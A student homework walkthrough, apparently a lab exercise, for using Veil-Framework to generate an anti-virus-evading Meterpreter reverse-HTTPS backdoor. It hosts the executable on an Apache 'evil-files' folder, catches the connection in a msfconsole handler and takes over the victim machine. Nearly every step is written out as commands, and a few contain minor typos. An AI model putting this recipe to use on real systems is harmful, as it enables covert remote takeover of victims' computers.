Information technology homework (Linux & Windows)

Using veil-framework to Create a Backdoor

1. Introduction

Veil is a tool designed to generate metasploit payloads (Meterpreter) that bypass common anti-virus solutions.

Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers

and is extended over the network at runtime.

It communicates over the stager socket and provides a comprehensive client-side Ruby API.

It features command history, tab completion, channels, and more.

Metepreter was originally written by skape for Metasploit 2.x,

common extensions were merged for 3.x and is currently undergoing an overhaul for Metasploit 3.3.

Msfconsole handles the incoming connection. Msfconsole is a part of Metasploit Framework

Reverse http: victim acts as client. Not the attack. Backdoor connect to me (attacker) to void anti-virus detection.

2. Check environment setting up. My Window IP: 10.0.2.8

ipconfig

b. in Kali (Password: toor). My Kali IP: 10.0.2.7

ifconfig

3. Install Veil in Kali. You need to open a Kail Terminator

mkdir opt

cd opt

git clone https://github.com/Veil-Framework/Veil.git

cd Veil

cd setup

./setup.sh (enter "y" if asks)

(close the console)

4. Attacker set payload options using Veil

(open the console)

cd /opt/Veil

./Veil.py (you should see the Veil interface now)

list (for two tools)

use 1 (using Evasion tool)

list (list all payloads)

use 15 (go/meterpreter/rev_https.py)

set LHOST 10.0.2.7 (this IP is my attack machine, I want the payload to talk to me, e.g., reverse http)

set LPORT 8080 (http port, don't use 80)

6

set SLEEP 6

options (see changed parameters)

5. Attacker uses Veil to generate backdoor payload (executable)

generate (you should see interface)

rev_https_8080 (backdoor name to remember easily)

(generated file name: /usr/share/veil-output/compiled/rev_https_8080.exe)

(optional: https://nodistribute.com/ to check if the backdoor will be detected)

(close the console/Terminator)

6. Attacker load the backdoor to website (On attacker's machine)

(open a file folder)

/ (allow you to type path)

/var/www/html

(create a folder evil-files)

(control-N to open another file window)

/usr/share/veil-output/compiled/ (you will see the backdoor file)

(copy the .exe file to evil-files folder)

(open Terminator)

service apache2 start (start the website)

7. Attacker listening incoming connection (Sever/Attacker side)

(open another Terminator or split current Terminator)

msfconsole (you should see interface)

use exploit/multi/handler

set PAYLOAD windows/meterpreter/reverse_https

show options (see all parameters for the payload)

set LHOST 10.0.2.7 (this IP is my attack machine, I am waiting, e.g., reverse http)

set LPORT 8080 (http port, don't use 80, same setting)

show options (see all parameters for the payload)

exploit (Now attacker is listening)

8. Victim download the backdoor payload from the website (Window machine)

(open IE)

10.0.2.7/evil-files

(click the rev_https_8080.exe and run anyway)

9. Access to victim’s machine

(enter, you will see msg promote again)

sessions -i

session -i 1

sys info

ps

(you will see victim connects to the attacker)

Reference

https://www.udemy.com/learn-social-engineering-from-scratch/

https://cyruslab.net/2012/03/07/metasploit-about-meterpreter/

https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/

https://www.youtube.com/watch?v=W1rCVyGwKQ4